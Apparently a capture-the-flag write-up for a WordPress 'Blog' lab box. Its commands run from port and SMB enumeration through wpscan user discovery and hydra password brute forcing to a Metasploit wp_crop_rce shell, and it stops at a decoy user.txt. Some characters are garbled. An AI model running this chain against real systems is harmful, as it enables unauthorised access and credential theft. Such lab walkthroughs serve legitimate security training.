su
echo "10.10.54.35 blog.thm" >> /etc/hosts
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
Start Reconnaissance
mkdir blog
cd blog
nmap blog.thm
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
nmap -sV -sC -Pn -oA blog blog.thm
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 578ada90baed3a470c05a3f7a80a8d78 (RSA)
| 256 c264efabb19a1c87587c4bd50f204626 (ECDSA)
|_ 256 5af26292118ead8a9b23822dad53bc16 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel's IT Blog – The IT blog
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.0
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: blog
| NetBIOS computer name: BLOG\x00
| Domain name: \x00
| FQDN: blog
|_ System time: 2023-05-15T08:44:45+00:00
| smb2-time:
| date: 2023-05-15T08:44:45
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
nmap -p445 --script smb-protocols blog.thm
| smb-protocols:
| dialects:
| NT LM 0.12 (SMBv1) [dangerous, but default]
| 202
| 210
| 300
| 302
|_ 311
smbmap -u guest -p "" -d . -H blog.thm
smbclient -L blog.thm -N
smbclient //blog.thm/BillySMB -N
get check-this.png
# This looks like a rabbit hole
enum4linux -a blog.thm
đ Found local user bjoel
Enumerate all the WordPress users using WpScan
wpscan --url=http://blog.thm --enumerate u
đ Found 2 WordPress users: bjoel, kwheel
Check for WordPress 5.0 vulnerabilities
searchsploit wordpress 5.0
This module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post.
Since Karen Wheeler has author access to the blog, brute force the user kwheel.
Navigate to http://blog.thm/wp-login.php and try a password with user kwheel. Copy the HTTP POST request in raw format, it is necessary for the Hydra command.
hydra -l kwheel -P /usr/share/wordlists/rockyou.txt blog.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.54.35%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username" -V
# Third string is the test condition, F: = test for failure. String got from the HTTP response.
# WPScan
echo -e 'kwheel'> user.txt
wpscan --url http://blog.thm -P /usr/share/wordlists/rockyou.txt -U user.txt -t 75
đ kwheeler:cutiepie1
Exploitation
Use Metasploit with module exploit/multi/http/wp_crop_rce
metasploit -q
setg RHOSTS blog.thm
setg RHOST blog.thm
use exploit/multi/http/wp_crop_rce
set LHOST 10.18.65.48
set USERNAME kwheel
set PASSWORD cutiepie1
run
shell
script -qc /bin/bash /dev/null
find / -type f -iname user.txt 2>/dev/null
ls /home/bjoel/
cat /home/bjoel/user.txt
You won't find what you're looking for here.
TRY HARDER
exit # to exit the shell
